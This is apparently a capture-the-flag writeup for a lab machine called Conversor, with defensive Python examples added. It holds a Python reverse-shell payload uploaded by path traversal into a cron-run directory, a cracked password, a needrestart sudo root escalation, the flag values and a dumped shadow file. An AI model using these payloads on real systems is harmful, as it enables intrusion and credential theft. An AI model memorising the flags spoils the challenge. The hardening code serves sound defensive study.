[Season9] Conversor WP

User Flag

The scan shows port 80 open; the hostname has to be added to the hosts file before the site can be accessed.

Register an account, then log in.

We are Conversor. Have you ever performed large scans with Nmap and wished for a more attractive display? We have the solution! All you need to do is upload your XML file along with the XSLT sheet to transform it into a more aesthetic format. If you prefer, you can also download the template we have developed here: [Download Template](http://conversor.htb/static/nmap.xslt)

The application asks for an XML file and an XSLT file to be uploaded, which immediately suggests XXE.

The source code can be downloaded from the about page.

Because the parser is created as parser = etree.XMLParser(resolve_entities=False, no_network=True, dtd_validation=False, load_dtd=False), XXE is not possible; an attempt at XSLT injection using document() to read files was also unsuccessful.

Reading install.md reveals:

You can also run it with Apache using the app.wsgi file.

If you want to run Python scripts (for example, our server deletes all files older than 60 minutes to avoid system overload), you can add the following line to your /etc/crontab.

"""
* * * * * www-data for f in /var/www/conversor.htb/scripts/*.py; do python3 "$f"; done
"""

The application also has a directory traversal, so we can write straight into scripts:

xml_path = os.path.join(UPLOAD_FOLDER, xml_file.filename)
xslt_path = os.path.join(UPLOAD_FOLDER, xslt_file.filename)
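
The two os.path.join lines above trust the client-supplied filename, which is the whole bug. The following is an added example (not the Conversor app's code) that puts the vulnerable pattern next to a hardened version; UPLOAD_FOLDER is an assumed value, since the page does not show the real one, and the traversal name used in main is the one from this writeup.

```python
import os
from typing import Tuple

# Assumed upload directory for this example; the real app's value is not on the page.
UPLOAD_FOLDER = "/var/www/conversor.htb/uploads"


def vulnerable_upload_path(filename: str) -> str:
    """The pattern from the writeup: os.path.join with a client-controlled name,
    so '../scripts/x.py' walks out of the upload directory."""
    return os.path.join(UPLOAD_FOLDER, filename)


def escapes_upload_dir(path: str) -> bool:
    """True if the normalised path lies outside UPLOAD_FOLDER."""
    base = os.path.normpath(UPLOAD_FOLDER)
    return os.path.commonpath([base, os.path.normpath(path)]) != base


def safe_upload_path(filename: str, allowed_ext: Tuple[str, ...] = (".xml", ".xslt")) -> str:
    """Hardened version: keep only the last path component, reject empty or
    hidden names, whitelist the extension, and confirm the resolved path is
    still inside UPLOAD_FOLDER. Raises ValueError on anything suspicious."""
    # Normalise Windows separators first so '..\\' cannot hide a traversal,
    # then drop every directory component (including '..').
    name = os.path.basename(filename.replace("\\", "/"))
    if not name or name.startswith("."):
        raise ValueError("invalid filename")
    # The cron job on this box runs every *.py in scripts/, so an extension
    # whitelist closes the hole even if the basename check were bypassed.
    if os.path.splitext(name)[1].lower() not in allowed_ext:
        raise ValueError("extension not allowed")
    # Defence in depth: resolve and check containment.
    base = os.path.realpath(UPLOAD_FOLDER)
    candidate = os.path.realpath(os.path.join(base, name))
    if os.path.commonpath([base, candidate]) != base:
        raise ValueError("path escapes upload directory")
    return candidate


def is_rejected(filename: str) -> bool:
    """Helper for the reader: does the hardened function refuse this name?"""
    try:
        safe_upload_path(filename)
        return False
    except ValueError:
        return True


if __name__ == "__main__":
    traversal = "../scripts/l1nk.py"  # the name used in this writeup
    print(vulnerable_upload_path(traversal), "->", escapes_upload_dir(vulnerable_upload_path(traversal)))
    print(safe_upload_path("scan.xml"))
    print("rejected:", is_rejected(traversal))
```

Note that safe_upload_path("../scripts/scan.xml") is accepted as uploads/scan.xml: the basename step sanitises rather than rejects, and the extension whitelist is what keeps .py out of the cron directory.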

Part of the payload, a reverse shell:

Content-Disposition: form-data; name="xml_file"; filename="../scripts/l1nk.py"
Content-Type: text/xml

import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.16.11",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")

The fismathack user is found in users.db:

sqlite> .tables
files users
sqlite> select * FROM users;
1|fismathack|5b5c3ac3a1c897c94caad48e6c71fdec

hashcat cracks it: 5b5c3ac3a1c897c94caad48e6c71fdec:Keepmesafeandwarm
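
The users table stores a bare, unsalted MD5, which is why a wordlist run recovers it so quickly. The following is an added example (not the Conversor app's code) showing how such a column is verified and how to migrate it to salted PBKDF2 with the standard library on the next successful login; the iteration count is an assumption for this example.

```python
import hashlib
import hmac
import os
from typing import Optional, Tuple

PBKDF2_ITERATIONS = 600_000  # assumed for this example; tune to your hardware


def legacy_md5_matches(candidate: str, digest: str) -> bool:
    """Verify a candidate against an unsalted MD5 hash. No salt and no work
    factor means one cheap hash per guess, and every user with the same
    password shares the same digest, so one wordlist pass covers all rows."""
    return hmac.compare_digest(hashlib.md5(candidate.encode()).hexdigest(), digest)


def pbkdf2_hash(password: str, salt: Optional[bytes] = None) -> str:
    """Store as 'pbkdf2_sha256$iterations$salt_hex$digest_hex'. A random
    16-byte salt per user defeats precomputed and shared-digest attacks and the
    iteration count makes each guess cost many SHA-256 rounds instead of one MD5."""
    salt = salt or os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ITERATIONS)
    return "pbkdf2_sha256$%d$%s$%s" % (PBKDF2_ITERATIONS, salt.hex(), dk.hex())


def pbkdf2_verify(password: str, stored: str) -> bool:
    """Constant-time check of a password against a pbkdf2_hash() value."""
    try:
        algo, iters, salt_hex, dk_hex = stored.split("$")
    except ValueError:
        return False
    if algo != "pbkdf2_sha256":
        return False
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), bytes.fromhex(salt_hex), int(iters))
    return hmac.compare_digest(dk.hex(), dk_hex)


def upgrade_on_login(candidate: str, stored: str) -> Tuple[bool, str]:
    """Transparent migration: if the stored value is a bare 32-hex MD5 and the
    candidate matches, re-hash with PBKDF2 and return the new value to persist.
    Returns (login_ok, value_to_store)."""
    is_legacy = len(stored) == 32 and all(c in "0123456789abcdef" for c in stored.lower())
    if is_legacy:
        if legacy_md5_matches(candidate, stored.lower()):
            return True, pbkdf2_hash(candidate)
        return False, stored
    return pbkdf2_verify(candidate, stored), stored


if __name__ == "__main__":
    # The digest and password reported in this writeup for the fismathack row.
    legacy = "5b5c3ac3a1c897c94caad48e6c71fdec"
    ok, new_value = upgrade_on_login("Keepmesafeandwarm", legacy)
    print(ok, new_value[:40] + "...")
```

The usual deployment is to call upgrade_on_login() in the login handler and write value_to_store back whenever it differs from what was read, so the MD5 column disappears as users log in.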

su fismathack, then read user.txt: d70d58fa65111b5a50c81aa983d1074d

Root Flag

sudo -l shows that /usr/sbin/needrestart can be run:

sudo -l
Matching Defaults entries for fismathack on conversor:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
use_pty

User fismathack may run the following commands on conversor:
(ALL : ALL) NOPASSWD: /usr/sbin/needrestart

root.txt

echo 'system("/bin/bash");' > test
sudo /usr/sbin/needrestart -c test
cat /root/root.txt
28c59671af7061f3da53255a430139fb
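
The root step works because the sudoers rule grants needrestart with no argument restriction, so -c can point it at an arbitrary config file, which needrestart evaluates as Perl. The following is an added example (not from this writeup) that scans sudoers text for NOPASSWD rules whose command is a bare path and proposes the pinned form; the sudoers lines it contains are constructed for the example, not the box's real file.

```python
import re
from typing import List, Tuple

# Constructed sample, not the box's real /etc/sudoers; the fismathack line
# mirrors the rule shown by sudo -l above.
SAMPLE_SUDOERS = """\
# constructed sample sudoers
Defaults env_reset, use_pty
root ALL=(ALL:ALL) ALL
fismathack ALL=(ALL : ALL) NOPASSWD: /usr/sbin/needrestart
deploy ALL=(root) NOPASSWD: /usr/bin/systemctl restart app.service, /usr/bin/systemctl status app.service
backup ALL=(root) NOPASSWD: /usr/sbin/needrestart ""
ops ALL=(root) NOPASSWD: /usr/bin/apt-get
"""

# user  host=(runas) [tags:] commands   -- we only care about the NOPASSWD tag.
NOPASSWD_RE = re.compile(r"^(?P<user>\S+)\s+\S+=.*?NOPASSWD:\s*(?P<cmds>.+)$")


def unrestricted_nopasswd(sudoers_text: str) -> List[Tuple[str, str]]:
    """Return (user, command) pairs for NOPASSWD commands given as a bare path:
    no fixed arguments and no trailing "" (sudoers syntax for 'no arguments').
    Such a rule lets the user supply any flags to the privileged binary."""
    findings = []
    for line in sudoers_text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or line.startswith("Defaults"):
            continue
        m = NOPASSWD_RE.match(line)
        if not m:
            continue
        for cmd in m.group("cmds").split(","):
            cmd = cmd.strip()
            # Anything after the path (explicit args or "") restricts the command line.
            if cmd and " " not in cmd:
                findings.append((m.group("user"), cmd))
    return findings


def pinned_rule(user: str, command: str) -> str:
    """Suggested replacement: same command, arguments pinned to none."""
    return '%s ALL=(root) NOPASSWD: %s ""' % (user, command)


if __name__ == "__main__":
    for user, cmd in unrestricted_nopasswd(SAMPLE_SUDOERS):
        print("unrestricted:", user, cmd)
        print("  suggest   :", pinned_rule(user, cmd))
```

Pinning to "" (or to the exact argument list the user actually needs) is the sudoers-level fix; the checker only understands the single-line user rules shown, not Cmnd_Alias definitions or line continuations.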

Hash

/etc/shadow

root:$y$j9T$CxUp91Y7aNmCAg.0BrP1N1$NFfbRCjYo56DBVoop2pwSbs9snvrUGR0IEINR4qZfmB:20301:0:99999:7:::
daemon:*:19977:0:99999:7:::
bin:*:19977:0:99999:7:::
sys:*:19977:0:99999:7:::
sync:*:19977:0:99999:7:::
games:*:19977:0:99999:7:::
man:*:19977:0:99999:7:::
lp:*:19977:0:99999:7:::
mail:*:19977:0:99999:7:::
news:*:19977:0:99999:7:::
uucp:*:19977:0:99999:7:::
proxy:*:19977:0:99999:7:::
www-data:*:19977:0:99999:7:::
backup:*:19977:0:99999:7:::
list:*:19977:0:99999:7:::
irc:*:19977:0:99999:7:::
gnats:*:19977:0:99999:7:::
nobody:*:19977:0:99999:7:::
_apt:*:19977:0:99999:7:::
systemd-network:*:19977:0:99999:7:::
systemd-resolve:*:19977:0:99999:7:::
messagebus:*:19977:0:99999:7:::
systemd-timesync:*:19977:0:99999:7:::
pollinate:*:19977:0:99999:7:::
syslog:*:19977:0:99999:7:::
uuidd:*:19977:0:99999:7:::
tcpdump:*:19977:0:99999:7:::
tss:*:19977:0:99999:7:::
landscape:*:19977:0:99999:7:::
fwupd-refresh:*:19977:0:99999:7:::
usbmux:*:20300:0:99999:7:::
fismathack:$y$j9T$Em7KF.PXS5RiFQPkRzVUo.$tMXvaVSk5wpypsh250ddml9Ko./E8.7DnQSgs2AhKx2:20314:0:99999:7:::
lxd:!:20300::::::
sshd:*:20300:0:99999:7:::
_laurel:!:20382::::::